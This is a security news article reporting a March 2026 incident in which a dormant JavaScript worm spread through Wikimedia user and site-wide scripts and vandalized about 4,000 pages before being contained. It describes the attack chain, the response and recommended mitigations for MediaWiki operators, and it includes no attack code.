PROBABLYPWNED
MalwareMarch 7, 20263 min read

Wikipedia Hit by Self-Propagating JavaScript Worm

A dormant JavaScript worm activated during a security review vandalized 4,000 Wikipedia pages in 23 minutes. Here's what happened and why it matters.

James Rivera

The Wikimedia Foundation disclosed a security incident on March 5 after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across its wikis. The worm modified approximately 3,996 pages and compromised 85 user accounts before engineers contained the outbreak—all within 23 minutes.

What Happened

Wikimedia staff were conducting a routine security review of user-authored code when they inadvertently triggered dormant malicious code. The script, stored at User:Ololoshka562/test.js, had been uploaded in March 2024 and sat dormant for two years before activation.

Once executed, the worm self-propagated by injecting malicious JavaScript loaders into both individual users' common.js files and Wikipedia's global MediaWiki:Common.js—which loads for every visitor. This dual-injection technique gave the worm both user-level and site-wide persistence.

The attack chain worked like this: when an administrator or privileged user loaded a compromised page, the script executed in their browser context and used their elevated permissions to spread to additional pages. Because MediaWiki:Common.js is a protected system file, the attacker needed admin-level access to modify it—which they obtained by hijacking administrator sessions.

Technical Details

According to Wikimedia's incident report, the malicious script was allegedly associated with previous attacks on wiki projects. The code had been designed to:

  1. Inject loaders into User:/common.js for user-level persistence
  2. Modify MediaWiki:Common.js for site-wide execution
  3. Vandalize article content on Meta-Wiki
  4. Propagate to any privileged user who loaded a compromised page

The script exploited a fundamental trust model in MediaWiki: user scripts execute with the full permissions of the logged-in user. For administrators, this means write access to protected system files.

Why This Matters

Wikipedia's open editing model has always balanced accessibility against security. This incident highlights how that balance can be exploited—even by code that sat dormant for years waiting to be triggered.

The attack mirrors supply chain compromises we've seen in other ecosystems. Similar to how threat actors have planted malicious packages in npm registries to wait for installation, this attacker uploaded malicious code and simply waited. The two-year dormancy period made detection nearly impossible through conventional means.

For organizations running MediaWiki instances—including corporate wikis and internal knowledge bases—this incident underscores the need to audit user-uploaded scripts. The Wikimedia Foundation has confirmed they're implementing additional code review processes for user scripts.

No Data Breach Confirmed

Wikimedia emphasized that no personal information was exposed. The worm's behavior was purely destructive—vandalizing pages and modifying scripts—rather than data exfiltration. All affected pages have been restored from backups.

"The code was active for a 23 minute period," the Foundation stated. "During that time, it changed and deleted content on Meta-Wiki—which is now being restored—but it did not cause permanent damage. There is no evidence that Wikipedia was under attack, or that personal information was breached."

Detection and Response

Engineers detected the anomalous activity through automated monitoring that flagged unusual edit patterns. They temporarily restricted editing across all projects while investigating, then began systematically reverting malicious changes.

The rapid response demonstrates why monitoring for suspicious behavior matters more than perimeter defenses alone. The worm was already executing inside trusted infrastructure—only behavioral detection caught it.

Organizations running wiki platforms should review their security configurations. Key mitigations include:

  1. Audit existing user scripts for dormant malicious code
  2. Implement Content Security Policy to restrict script execution
  3. Enable edit monitoring to detect mass automated changes
  4. Restrict system file modifications to verified accounts with MFA
  5. Maintain offline backups separate from production systems

The incident serves as a reminder that open platforms require ongoing vigilance. Dormant threats can activate without warning, and two-year-old code can become today's security incident.

Related Articles